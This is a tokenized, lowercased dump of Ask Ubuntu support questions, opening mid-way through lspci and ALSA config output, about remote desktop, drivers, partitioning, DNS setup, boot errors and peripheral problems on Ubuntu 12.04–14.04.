memory behind bridge : e3500000-e35fffff capabilities : < access denied > kernel driver in use : pcieport 00:1c.3 pci bridge : intel corporation lynx point-lp pci express root port 4 ( rev e4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=03 , subordinate=03 , sec-latency=0 i/o behind bridge : 00004000-00004fff memory behind bridge : e3400000-e34fffff prefetchable memory behind bridge : 00000000bfb00000-00000000bfbfffff capabilities : < access denied > kernel driver in use : pcieport 00:1c.4 pci bridge : intel corporation lynx point-lp pci express root port 5 ( rev e4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=04 , subordinate=04 , sec-latency=0 i/o behind bridge : 00003000-00003fff memory behind bridge : e2000000-e2ffffff prefetchable memory behind bridge : 00000000d0000000-00000000e1ffffff capabilities : < access denied > kernel driver in use : pcieport 00:1d.0 usb controller : intel corporation lynx point-lp usb ehci # 1 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : dell device 05f9 flags : bus master , medium devsel , latency 0 , irq 23 memory at e361d000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci-pci 00:1f.0 isa bridge : intel corporation lynx point-lp lpc controller ( rev 04 ) subsystem : dell device 05f9 flags : bus master , medium devsel , latency 0 capabilities : < access denied > kernel driver in use : lpc_ich 00:1f.2 sata controller : intel corporation lynx point-lp sata controller 1 [ ahci mode ] ( rev 04 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : dell device 05f9 flags : bus master , 66mhz , medium devsel , latency 0 , irq 59 i/o ports at 5088 [ size=8 ] i/o ports at 5094 [ size=4 ] i/o ports at 5080 [ size=8 ] i/o ports at 5090 [ size=4 ] i/o ports at 5060 [ size=32 ] memory at e361c000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : < access denied > kernel driver in use : ahci 00:1f.3 smbus : intel corporation lynx point-lp smbus controller ( rev 04 ) subsystem : dell device 05f9 flags : medium devsel , irq 255 memory at e3618000 ( 64-bit , non-prefetchable ) [ size=256 ] i/o ports at efa0 [ size=32 ] 02:00.0 network controller : intel corporation wireless 7260 ( rev 73 ) subsystem : intel corporation dual band wireless-n 7260 flags : bus master , fast devsel , latency 0 , irq 64 memory at e3500000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : < access denied > kernel driver in use : iwlwifi 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5287 ( rev 01 ) subsystem : dell device 05f9 flags : bus master , fast devsel , latency 0 , irq 57 memory at e3405000 ( 32-bit , non-prefetchable ) [ size=4k ] expansion rom at bfb00000 [ disabled ] [ size=64k ] capabilities : < access denied > kernel driver in use : rtsx_pci 03:00.1 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 12 ) subsystem : dell device 05f9 flags : bus master , fast devsel , latency 0 , irq 58 i/o ports at 4000 [ size=256 ] memory at e3404000 ( 64-bit , non-prefetchable ) [ size=4k ] memory at e3400000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : r8168 04:00.0 3d controller : nvidia corporation gk107m [ geforce gt 750m ] ( rev ff ) ( prog-if ff ) ! ! ! unknown header type 7f /etc/modprobe.d/alsa-base.conf contents : # autoloader aliases install sound-slot-0 /sbin/modprobe snd-card-0 install sound-slot-1 /sbin/modprobe snd-card-1 install sound-slot-2 /sbin/modprobe snd-card-2 install sound-slot-3 /sbin/modprobe snd-card-3 install sound-slot-4 /sbin/modprobe snd-card-4 install sound-slot-5 /sbin/modprobe snd-card-5 install sound-slot-6 /sbin/modprobe snd-card-6 install sound-slot-7 /sbin/modprobe snd-card-7 # cause optional modules to be loaded above generic modules install snd /sbin/modprobe -- ignore-install snd $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-ioctl32 ; /sbin/modprobe -- quiet -- use-blacklist snd-seq ; } # # workaround at bug # 499695 ( reverted in ubuntu see lp # 319505 ) install snd-pcm /sbin/modprobe -- ignore-install snd-pcm $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-pcm-oss ; : ; } install snd-mixer /sbin/modprobe -- ignore-install snd-mixer $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-mixer-oss ; : ; } install snd-seq /sbin/modprobe -- ignore-install snd-seq $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq-midi ; /sbin/modprobe -- quiet -- use-blacklist snd-seq-oss ; : ; } # install snd-rawmidi /sbin/modprobe -- ignore-install snd-rawmidi $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq-midi ; : ; } # cause optional modules to be loaded above sound card driver modules install snd-emu10k1 /sbin/modprobe -- ignore-install snd-emu10k1 $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-emu10k1-synth ; } install snd-via82xx /sbin/modprobe -- ignore-install snd-via82xx $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq ; } # load saa7134-alsa instead of saa7134 ( which gets dragged in by it anyway ) install saa7134 /sbin/modprobe -- ignore-install saa7134 $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist saa7134-alsa ; : ; } # prevent abnormal drivers from grabbing index 0 options bt87x index=-2 options cx88_alsa index=-2 options saa7134-alsa index=-2 options snd-atiixp-modem index=-2 options snd-intel8x0m index=-2 options snd-via82xx-modem index=-2 options snd-usb-audio index=-2 options snd-usb-caiaq index=-2 options snd-usb-ua101 index=-2 options snd-usb-us122l index=-2 options snd-usb-usx2y index=-2 # ubuntu # 62691 , enable mpu for snd-cmipci options snd-cmipci mpu_port=0x330 fm_port=0x388 # keep snd-pcsp from being loaded as first soundcard options snd-pcsp index=-2 # keep snd-usb-audio from beeing loaded as first soundcard options snd-usb-audio index=-2
464389	xrdp gray screen , tried everything	after a couple days of searching for solutions , i still can not get a proper rdp connection fron windows 7 to ubuntu desktop 13.10 ( or 14.04 ) . when i use rdp in windows , it will connect to my ubuntu box just fine , but i get a gray/black pixel screen with an `` x '' for a cursor . here 's what i 've tried so far ( in both 13.10 and 14.04 ) created .xsession file to use gnome-2d installed xfce4 and updated .xsession file to use that i did indeed restart xrdp after any change to the .xsession file modified startwm.sh to point to the location of the .xsession file chmod 755 .xsession file so it 's executable updated nvidia drivers i 'm at a loss as to what 's going on . i was able to use x11vnc to take control of the ubuntu machine , but i 'm trying to create an actual remote session from windows , and not just take control . any help would be greatly appreciated , i 've been searching around for a solution , and so far any other people who 've encountered this , their solution has not been successful for me .
464390	scanner recognition	i have a hp photosmart b210 connected via usb to the computer , which prints fine . however when attempting to scan from the device , i get the error message `` make sure the printer installed properly , and then start the scan job with computer '' on the device 's display screen ( not on the computer ) . i tried reinstalling the device driver from hp with no avail . i can not find a method to start the scan from the computer . when this device was installed when running windows , it scanned fine from the device . i 'm running 14.04 lts . any ideas ? thanks , steve
464391	how to create a shared parellels folder in ubuntu ?	i have renamed my 'shared parallels folder ' to `` mac '' . since doing this the folder/browser has been unable to link or show any of my folders shared on my linux vc via my mac . how do i create another shared folder ? or will it be best to bin the vc and reload a new one ?
464393	move window in dual monitor setup	i 'm running a dual monitor setup , with one of the monitors most of the time in standby , but connected ( it 's a tv ) . it works fine if both are turned on , but when the monitor is in standby mode some windows still open on that screen . where i ca n't see the window to select it and drag it back to the correct screen . as i 'm running ubuntu 14.04 with unity , i ca n't select the invisible windows either , because the unity launcher only shows application windows on the current screen/workspace ? what i can do however is use alt+tab to select the window and then drag it back with alt+f7 . but this is quite a hassle if you have to do it with a lot of windows . sometimes i resort to just pulling the cable from the back of my pc , which does move all the screens into the correct screen . so is it possible to : make the windows open on the screen that is actually on and not just connected in standby mode . make unity show all windows in the launcher ( i do n't even have the launcher enabled on the second screen ? ) . have a shortcut to move the screens back to the correct screen in one go . i have an ati graphics card with proprietary drivers and the always on screen is the primary screen . thanks ! p.s . output of xrandr : displayport-0 disconnected ( normal left inverted right x axis y axis ) displayport-1 disconnected ( normal left inverted right x axis y axis ) hdmi-0 connected 1920x1080+1920+0 ( normal left inverted right x axis y axis ) dvi-0 connected primary 1920x1080+0+0 ( normal left inverted right x axis y axis )
464396	ca n't open google chrome , ca n't search applications in dash , startup applications stopped running	i am experiencing many issues with my fresh installation of ubuntu 14.04 : i ca n't open google chrome from the sidebar . i ca n't search any applications in the dash . f.lux and screencloud have stopped running on startup . as far as i can recall i began experiencing these issues after setting up the google app engine sdk for php , but it 's possible this is being caused by something else entirely . running google-chrome in the terminal returns : [ 6119:6119:0511/161156 : error : process_singleton_linux.cc ( 903 ) ] failed to create socket directory . [ 6119:6119:0511/161156 : error : chrome_browser_main.cc ( 1198 ) ] failed to create a processsingleton for your profile directory . this means that running multiple instances would start multiple browser processes rather than opening a new window in the existing process . aborting now to avoid profile corruption . screencloud displays an alert box on startup saying screencloud is already running . please close the running instance before starting a new one . lastly , there is an error icon in the system tray which has displayed a few different error messages : http : //imgur.com/puvmsy8 http : //imgur.com/ltkoqay i have researched each of these issues individually , tried every solution i could find , rebooted a hundred times , but nothing has changed . what can i do ?
464397	should i make a partition for ubuntu before installing ?	should i make a separate partition for ubuntu before installing ? i 'm just wondering if it would be beneficial . [ dual boot with windows 8.1 ]
464399	error starting up dns forward zone file	i am working setting up my dns , but i am getting errors in : tail -f /var/sys/log . i have setted up a static ip-adress in networks : 192.168.10.1 may 11 18:13:54 s180368 named [ 3582 ] : command channel listening on : :1 # 953 may 11 18:13:54 s180368 named [ 3582 ] : managed-keys-zone : loaded serial 2 may 11 18:13:54 s180368 named [ 3582 ] : zone 0.in-addr.arpa/in : loaded serial 1 may 11 18:13:54 s180368 named [ 3582 ] : zone 127.in-addr.arpa/in : loaded serial 1 may 11 18:13:54 s180368 named [ 3582 ] : zone s180368.com/in : has no ns records may 11 18:13:54 s180368 named [ 3582 ] : zone s180368.com/in : not loaded due to errors . may 11 18:13:54 s180368 named [ 3582 ] : zone localhost/in : loaded serial 2 may 11 18:13:54 s180368 named [ 3582 ] : zone 255.in-addr.arpa/in : loaded serial 1 may 11 18:13:54 s180368 named [ 3582 ] : all zones loaded may 11 18:13:54 s180368 named [ 3582 ] : running this is my forward zone file ( db.s180368.com ) : ; $ ttl 604800 @ in soa ns.s180368.com . root.s180368.com . ( 2 ; serial 604800 ; refresh 86400 ; retry 2419200 ; expire 604800 ) ; negative cache ttl ; ns in ns 192.168.10.1 @ in a 127.0.0.1 named.conf.local : # forward lookup zone zone `` s180368.com '' { type master ; file `` /etc/bind/db.s180368.com '' ; } ; /etc/hosts : 127.0.0.1 localhost 127.0.1.1 server 192.168.10.1 s180368.com s180368 # the following lines are desirable for ipv6 capable hosts : :1 localhost ip6-localhost ip6-loopback ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters /etc/resolv.conf nameserver 127.0.0.1 search s180368.com
464400	comprehensive guide to setup android sdk with eclipse on ubuntu 14.04 lts 64 bit	i have shifted to ubuntu only few weeks ago and after setting up ubuntu my first step was to setup eclipse for android development . i do not have any knowledge of linux . i have searched on google and on this website for a comprehensive guide . most of the guides are for older versions of ubuntu and most of the instructions are not working for me . as i am not very well-versed in linux so often i had to start over with clean copy of ubuntu . i have found this guide that have ultimately made the android development worked for me . hopefully it will help other users too .
464402	choosing partition types for swap and root and choosing device for bootloader installation	i am trying to install ubuntu 12.04 via manual partitioning because i want to remove an existing windows 7 operating system but keep all my other partitions with their contents intact . my questions are : what partition types should i choose for the swap area and the root ? ( mind you , i am not asking about file system . ) one excellent answer on manual partitioning advises primary for swap and logical for root , but i want to recheck because there seem to be divergent tips on this in the various discussions i have been able to check . for `` device for bootloader installation '' should i choose the entire hdd ( which is given as the default choice ) or the particular partition where ubuntu is to be installed ?
464403	trying to install netbeans 7.4	when trying to install netbeans-7.4-linux.sh , i can not open my personal folder where the file is located . i try cd /home/myusername/downloads , but i get : file or folder does not exist . if i try to copy the file to a different folder outside my personal folders , i get a permission denied type of error . using ubuntu 13.10 .
464411	how to install openjdk on a machine without internet connection ? ubuntu 12.04	first excuse me as i am a newbie ... i 'm using ubuntu 12.04 without an internet connection . i have the iso file of the installation already mounted . correct me if i 'm wrong , but the java setup files should be in the repository . my questions are : what is the name of the jdk package on the cd ? what is the command to run the install ?
464413	is the acer aspire m touchscreen supported in ubuntu ?	i have an acer aspire m laptop that i 'm about to switch to ubuntu . will my touchscreen work after the switch ?
464415	ubuntu unity error after kubuntu-desktop	after installing kubuntu-desktop , when i log into a default unity session there are some minor cosmetic errors . the drop down menus ( file , edit , etc ) have black words on the black menu and the keyboard input option box on the left is now just a rectangle with a slashed circle in it . i have not noticed any other problems yet . i 'm using a system76 kudu professional laptop 14.04 64-bit
464418	getting error log information after a system crash	sorry , this is likely a bit of a naive question , but i 'm having some trouble with my graphics drivers causing my system to shut off randomly ( does n't seem to be overheating but let 's not worry about that right now ) . i ca n't do much without having some detailed error logs to share , but when i cat dmseg i 'm only getting information from when i boot up afterwards . is there a way to either get older information , or to keep a log running that will be saved if the system shuts off ( kind of like a black box ? )
464419	can not access osm map after server reboot	after rebooting my ubuntu server , i ca n't seem to access my map tile server at http : //192.168.86.128/osm/slippymap.html ( which i setup using the instructions at http : //seshagiriprabhu.wordpress.com/2013/07/21/building-an-openstreetmap-tile-server-on-ubuntu-12-04-lts/ ) , any idea why ? i am currently running a ubuntu-server-12.04-amd4 image on vmware professional .
464420	editing nautilus to add split screen ( f3 ) feature in ubuntu 14.04 lts	i previously used ubuntu 12.04 lts which has a version of nautilus with a split screen feature it was very handy . i recently installed the ubuntu 14.04 lts version by removing 12.04 version which does n't have this feature . can i get this feature back in ubuntu 14.04 lts , nautilus 3.10.1 by editing nautilus ' system files or library files that nautilus uses ? i found some solutions but i do n't want to downgrade nautilus to older versions or any patched versions . thanks in advance .
464421	problems after installation	i installed ubuntu on my macbook pro running osx 10.9.2 that has 251 gb of flash memory . i used a flash drive that i put ubuntu on using unetbootin , i did n't directly use an iso file but i used the automated option that downloads whatever distro you choose . after that finished i restarted my computer and chose ubuntu from the refind menu . it started fine and i selected install ubuntu from the desktop . the installation process went without error , i setup a swap partition and a normal partition in the 50gb of space i left . i selected reboot and ended up at the refind menu . i took out the flash drive and chose ubuntu but this time it was not from the flash drive . i was sent to a screen that had choices such as test memory , ubuntu , advanced options and other stuff . i chose the first choice , ubuntu and was brought to a black screen with a white flashing underscore and nothing else . i have tried so many times to install ubuntu on my mac but it has not yet worked . i 'm pretty sick of it so this is going to be my last attempt . also my usb went to a blue unetbootin screen and i let it automatically boot . at the top of the screen with ubuntu and memory test it said gnu grub version 2.02^beta2-9 . when i clicked on ubuntu it went to a black screen and said kernel panic- not syncing : no working init found . try pressiong init=option to kernel . see linux documentation init.txt .
464422	resize ubuntu partition to increase its size without reinstalling ubuntu	i 'm running out of space for my ubuntu os . is it possible to allocate more space for ubuntu without reinstalling it or adding a new physical hard drive ? i am using gparted to view my partitions , but ubuntu does not seem to pop up on it anywhere : screenshot of gparted disk space using system monitor disk space using system monitor df -h
464424	lubuntu can not run youtube	i have lubuntu 12.04 working alongside with windows xp on an old computer . every time i go to youtube it does't respond . it does n't even go to the page , but keeps loading . please help me !
464425	add driver to my server installation media ?	i am trying to install ubuntu 14.04 server on a machine via usb . the machine only has a wireless connection and needs the wl driver ( proprietary broadcom sta wireless driver ) . without this driver , the network detection process of the installation fails . on this machine , i can install ubuntu desktop via usb by booting the usb , running the following commands , then running the installation program . sudo mkdir /cdrom sudo mount /dev/sdx1 /cdrom sudo dpkg -i /cdrom/pool/main/d/dkms/dkms* sudo dpkg -i /cdrom/pool/restricted/b/bcmwl/bcmwl-kernel-source* however , there are two problems when i try to install from the ubuntu 14.04 server usb : the dkms and bcmwl-kernel-source packages are not included with the server iso . this is not a big problem since i can add these to my usb . there is no dpkg program in the server installation shell . how can i get my server installation media to have the additional kernel module wl ?
464427	bluetooth mouse lagging	i 've just bought a new bluetooth mouse ( thinkpad bluetooth mouse ) . i 'm able to connect it and it works but it lags and jumps ( the cursor does n't move smoothly as it should ) . at first i thought it was a hardware issue ( batteries ) , but i tried it on windows ( running dualboot ) and on widndows it worked without any lags . the mouse is close to the laptop ( 5-15cm ) . my laptop is lenovo thinkpad edge e531 . i 'm running ubuntu 14.04 . do anybody know where should the problem be ? thanks forward .
464428	enable nvidia card	my nvidia card was enabled and working fine , but then i tried to use nvidia-prime , but never got the prime settings in nvidia-settings . i found that there is a bug regarding this and decided to revert to my previous state . for this , i uninstalled all nvidia stuff ( apt-get purge nvidia-* ) , reinstalled nvidia-331 and went into my bios to use the nvidia card only ( no optimus or anything ) . now it looks like nvidia is being used again , but i think this is not true . `` about this computer '' as well as `` additional drivers '' tell me that it is active and using the proprietary driver . but if i , for example , start tmnf ( trackmania , a game ) with wine , it tells me it ca n't find the video card performance and when i start playing the game , it is very laggy and has graphics glitches â things that definitely were n't there before . another thing that makes me believe something is wrong : when booting , i get the grub screen asking what to boot and one screen asking me to unlock my hard drive . when using the intel card , these screens had high resolution ; using the nvidia card made them have poor resolution . in the current state , the first screen ( grub ) has poor resolution , but the unlock screen has high resolution as if it switched from nvidia to intel during booting . lastly , when opening the nvidia-settings , i get very little information/options , which usually is the case when the intel card is active . does anyone have any ideas what i could try or how to fix this ? reinstalling the system is something i 'd really like to avoid . update : i tried several methods described here and all tell me the nouveau driver is being used , not the proprietary one . if i boot the kernel with nomodeset , i am stuck with super low resolution . edit : my setup : lenovo t530 with ubuntu 14.04 .
464429	make fails when build libaacs with a 'syntax error '	i 'm having a problem when running make after i have configured libaacs-0.7.0 , it fails with a syntax error . i got the tarball from http : //download.videolan.org/pub/videolan/libaacs/0.7.0/ . i resolved all dependency issues when i ran configure and ran it to completetion . i did the same with make and fixed all problems before running again . i then tried sudo checkinstall and hit the same error : ========================= installation results =========================== making install in src make [ 1 ] : entering directory `/home/noki/workspace/libaacs-0.7.0/src' \ test -f keydbcfg-parser.c || \ /bin/bash ../build-aux/ylwrap `test -f 'file/keydbcfg-parser.y ' || echo './'`file/keydbcfg-parser.y y.tab.c keydbcfg-parser.c y.tab.h keydbcfg-parser.h y.output keydbcfg-parser.output -- byacc -d -p libaacs_yy byacc : e - line 1 of `` /home/noki/workspace/libaacs-0.7.0/src/file/keydbcfg-parser.y '' , syntax error % code requires { ^ make [ 1 ] : *** [ keydbcfg-parser.c ] error 1 make [ 1 ] : leaving directory `/home/noki/workspace/libaacs-0.7.0/src' make : *** [ install-recursive ] error 1 **** installation failed . aborting package creation . any help appreciated . **update this is the content of keydbcfg-parser.y http : //pastebin.com/xruiabfp i have not altered the source in anyway , simply building it . i have version 0.4.0 already installed and building that fails in the same way if i get the tarball for that version .
464432	ca n't boot after power loss	i am duel-booting ubuntu 12.04 and windows 8 . i was booted into ubuntu when i lost power and now when i try to boot into ubuntu it freezes on a black screen . however i can still boot into windows just fine . when i boot into recovery mode i get the fallowing error : there are differences between boot sector and its backup . differences : ( offset : original/backup ) 65:01/00 not automatically fixing this /dev/sda6 contains a file system with errors , check forced . checking disk drives for errors . this may take several minutes . press c to cancel all check in progress /dev/sda1 : 179 files , 7007/126976 clusters /dev/sda6 unattached inode 599991 /dev/sda6 : unexpected inconsistency ; run fsck manually . ( i.e. , without -a or -p options ) mountall : fsck / [ 1183 ] terminated with statas 4 mountall : filesystem has errors : / errors were found while checking the disk drive for / . press f to attempt to fix the errors , i to ignore , s to skip mounting , or m for manual recovery i tried pressing 'f ' to attempt to fix the errors but nothing happened . actually i tried pressing all of the mentioned keys ( 'f ' , 'i ' , 's ' , and 'm ' ) all on different reboots but the computer was unresponsive . i am new to ubuntu and linux in general so i do n't exactly know where to start . thanks in advance for any help .
464434	winbond w89c33d not recognized	using lubuntu 14.04 , my wlan is not working at all on my admittedly old laptop , although lan connection is working fine . first , the output of lspci -v : ~ $ lspci -v 00:00.0 host bridge : via technologies , inc. cn333/cn400/pm880 host bridge subsystem : mitac device 8965 flags : bus master , 66mhz , medium devsel , latency 8 memory at a0000000 ( 32-bit , prefetchable ) [ size=128m ] capabilities : < access denied > kernel driver in use : agpgart-via 00:00.1 host bridge : via technologies , inc. cn333/cn400/pm880 host bridge flags : bus master , medium devsel , latency 0 00:00.2 host bridge : via technologies , inc. cn333/cn400/pm880 cpu host bridge flags : bus master , medium devsel , latency 0 00:00.3 host bridge : via technologies , inc. cn333/cn400/pm880 host bridge flags : bus master , medium devsel , latency 0 00:00.4 host bridge : via technologies , inc. cn333/cn400/pm880 host bridge flags : bus master , medium devsel , latency 0 00:00.7 host bridge : via technologies , inc. cn333/cn400/pm880 host bridge flags : bus master , medium devsel , latency 0 00:01.0 pci bridge : via technologies , inc. vt8237/vx700 pci bridge ( prog-if 00 [ normal decode ] ) flags : bus master , 66mhz , medium devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 i/o behind bridge : 0000c000-0000dfff memory behind bridge : c0000000-cfffffff prefetchable memory behind bridge : 90000000-9fffffff capabilities : < access denied > 00:06.0 ethernet controller : winbond electronics corp w89c33d 802.11 a/b/g bb/mac subsystem : winbond electronics corp w89c33d 802.11 a/b/g bb/mac flags : medium devsel i/o ports at 1800 [ disabled ] [ size=256 ] i/o ports at 1080 [ disabled ] [ size=128 ] memory at fffffe00 ( 32-bit , non-prefetchable ) [ disabled ] [ size=512 ] capabilities : < access denied > 00:10.0 usb controller : via technologies , inc. vt82xxxxx uhci usb 1.1 controller ( rev 80 ) ( prog-if 00 [ uhci ] ) subsystem : mitac device 8965 flags : bus master , medium devsel , latency 22 , irq 21 i/o ports at 1200 [ size=32 ] capabilities : < access denied > kernel driver in use : uhci_hcd 00:10.1 usb controller : via technologies , inc. vt82xxxxx uhci usb 1.1 controller ( rev 80 ) ( prog-if 00 [ uhci ] ) subsystem : mitac device 8965 flags : bus master , medium devsel , latency 22 , irq 21 i/o ports at 1220 [ size=32 ] capabilities : < access denied > kernel driver in use : uhci_hcd 00:10.2 usb controller : via technologies , inc. vt82xxxxx uhci usb 1.1 controller ( rev 80 ) ( prog-if 00 [ uhci ] ) subsystem : mitac device 8965 flags : bus master , medium devsel , latency 22 , irq 21 i/o ports at 1240 [ size=32 ] capabilities : < access denied > kernel driver in use : uhci_hcd 00:10.3 usb controller : via technologies , inc. usb 2.0 ( rev 82 ) ( prog-if 20 [ ehci ] ) subsystem : mitac device 8965 flags : bus master , medium devsel , latency 22 , irq 21 memory at 4c000000 ( 32-bit , non-prefetchable ) [ size=256 ] capabilities : < access denied > kernel driver in use : ehci-pci 00:11.0 isa bridge : via technologies , inc. vt8235 isa bridge subsystem : mitac device 8965 flags : bus master , stepping , medium devsel , latency 0 capabilities : < access denied > 00:11.1 ide interface : via technologies , inc. vt82c586a/b/vt82c686/a/b/vt823x/a/c pipc bus master ide ( rev 06 ) ( prog-if 8a [ master secp prip ] ) subsystem : mitac device 8965 flags : bus master , stepping , medium devsel , latency 64 , irq 20 [ virtual ] memory at 000001f0 ( 32-bit , non-prefetchable ) [ size=8 ] [ virtual ] memory at 000003f0 ( type 3 , non-prefetchable ) [ virtual ] memory at 00000170 ( 32-bit , non-prefetchable ) [ size=8 ] [ virtual ] memory at 00000370 ( type 3 , non-prefetchable ) i/o ports at 1100 [ size=16 ] capabilities : < access denied > kernel driver in use : pata_via 00:11.5 multimedia audio controller : via technologies , inc. vt8233/a/8235/8237 ac97 audio controller ( rev 50 ) subsystem : mitac device 8965 flags : medium devsel , irq 22 i/o ports at e000 [ size=256 ] capabilities : < access denied > kernel driver in use : snd_via82xx 00:11.6 communication controller : via technologies , inc. ac'97 modem controller ( rev 80 ) subsystem : mitac device 8965 flags : medium devsel , irq 22 i/o ports at e100 [ size=256 ] capabilities : < access denied > kernel driver in use : snd_via82xx_modem 00:12.0 ethernet controller : via technologies , inc. vt6102 [ rhine-ii ] ( rev 74 ) subsystem : mitac device 8965 flags : bus master , stepping , medium devsel , latency 128 , irq 23 i/o ports at e200 [ size=256 ] memory at d0000000 ( 32-bit , non-prefetchable ) [ size=256 ] capabilities : < access denied > kernel driver in use : via-rhine 01:00.0 vga compatible controller : via technologies , inc. cn400/pm800/pm880/pn800/pn880 [ s3 unichrome pro ] ( rev 02 ) ( prog-if 00 [ vga controller ] ) subsystem : mitac device 8965 flags : bus master , 66mhz , medium devsel , latency 64 , irq 11 memory at 90000000 ( 32-bit , prefetchable ) [ size=64m ] memory at c0000000 ( 32-bit , non-prefetchable ) [ size=16m ] [ virtual ] expansion rom at 94000000 [ disabled ] [ size=64k ] capabilities : < access denied > the output of lshw -c network : sudo lshw -c network *-network:0 ungefordert beschreibung : ethernet controller produkt : w89c33d 802.11 a/b/g bb/mac hersteller : winbond electronics corp physische id : 6 bus-informationen : pci @ 0000:00:06.0 version : 00 breite : 32 bits takt : 33mhz fähigkeiten : pm cap_list konfiguration : latency=0 maxlatency=32 mingnt=64 ressourcen : ioport:1800 ( größe=256 ) ioport:1080 ( größe=128 ) memory : fffffe00-ffffffff *-network:1 beschreibung : ethernet interface produkt : vt6102 [ rhine-ii ] hersteller : via technologies , inc. physische id : 12 bus-informationen : pci @ 0000:00:12.0 logischer name : eth0 version : 74 seriennummer : 00:40 : d0:72 : d4 : db größe : 10mbit/s kapazität : 100mbit/s breite : 32 bits takt : 33mhz fähigkeiten : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation konfiguration : autonegotiation=on broadcast=yes driver=via-rhine driverversion=1.5.1 duplex=half latency=128 link=no maxlatency=8 mingnt=3 multicast=yes port=mii speed=10mbit/s ressourcen : irq:23 ioport : e200 ( größe=256 ) memory : d0000000-d00000ff i tried to download the latest driver for windows from this site , and extracted the files into one directory . there is now : netw33.cat netw33.inf w33nd.sys i tried to intall the driver using ndiswrapper , so i installed the packages : ndiswrapper-utils-1.9 ndiswrapper-common ndisgtk dkms ndiswrapper-dkms gksu first , i tried the graphical way , but when i have choosed the *.inf-file , and selected install , the whole system freezed , i had to force shutdown by pressing the power button . after that , i tried to install it using the terminal with the following commands : sudo ndiswrapper -i path·to·ini·file this worked fine , as the following output confirms : ndiswrapper -l netw33 : driver installed device ( 1050:0033 ) present following the instructions of these german instructions i loaded ndiswrapper with : sudo modprobe ndiswrapper but the system freezed , i had to force a shutdown . what can i do in order to get wlan working on the laptop ? i already tried both to install additional drivers , and to enable backports , without result . i still ca n't see any wireless networks in the menu .
464441	2.4 ghz rf mouse working only on one usb port	i am using lenovo b490 , running ubuntu with unity 14.04 . there are 4 usb ports on this laptop , 2 are usb 3 and 2 are usb 2 . all checked with pendrives and hard drives , they all work . i have one random unbranded wireless mouse , works with a tiny usb dongle . it works well but only from one of the usb ports , rest 3 it just wo n't budge . lsusb : ( without the dongle ) bus 002 device 003 : id 058f:6366 alcor micro corp. multi flash reader bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 005 : id 5986:0294 acer , inc bus 001 device 004 : id 105b : e065 bus 001 device 003 : id 147e:1002 upek biometric touchchip/touchstrip fingerprint sensor bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub lsusb : ( with the dongle inserted in the usb port where mouse works ) bus 002 device 003 : id 058f:6366 alcor micro corp. multi flash reader bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 005 : id 5986:0294 acer , inc bus 001 device 004 : id 105b : e065 bus 001 device 003 : id 147e:1002 upek biometric touchchip/touchstrip fingerprint sensor bus 001 device 020 : id 1d57:0016 xenta bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub non working port where mouse is inserted : bus 002 device 003 : id 058f:6366 alcor micro corp. multi flash reader bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 005 : id 5986:0294 acer , inc bus 001 device 004 : id 105b : e065 bus 001 device 003 : id 147e:1002 upek biometric touchchip/touchstrip fingerprint sensor bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub ~ $ dmesg | grep hid ( from working port ) [ 34.824499 ] hidraw : raw hid events driver ( c ) jiri kosina [ 35.210519 ] hid-generic 0005:046d : b006.0001 : unknown main item tag 0x0 [ 35.210702 ] hid-generic 0005:046d : b006.0001 : input , hidraw0 : bluetooth hid v1.24 mouse [ dell bt travel mouse ] on f8:2f : a8 : f6:9e:68 [ 82.159659 ] hid-generic 0003:1d57:0016.0002 : input , hidraw0 : usb hid v1.10 mouse [ hid wireless mouse hid wireless mouse ] on usb-0000:00:1a.0-1.2/input0 [ 82.159855 ] usbcore : registered new interface driver usbhid [ 82.159860 ] usbhid : usb hid core driver [ 129.046236 ] hid-generic 0003:1d57:0016.0003 : input , hidraw0 : usb hid v1.10 mouse [ hid wireless mouse hid wireless mouse ] on usb-0000:00:1a.0-1.2/input0 [ 152.425494 ] hid-generic 0005:046d : b006.0004 : unknown main item tag 0x0 [ 152.425832 ] hid-generic 0005:046d : b006.0004 : input , hidraw0 : bluetooth hid v1.24 mouse [ dell bt 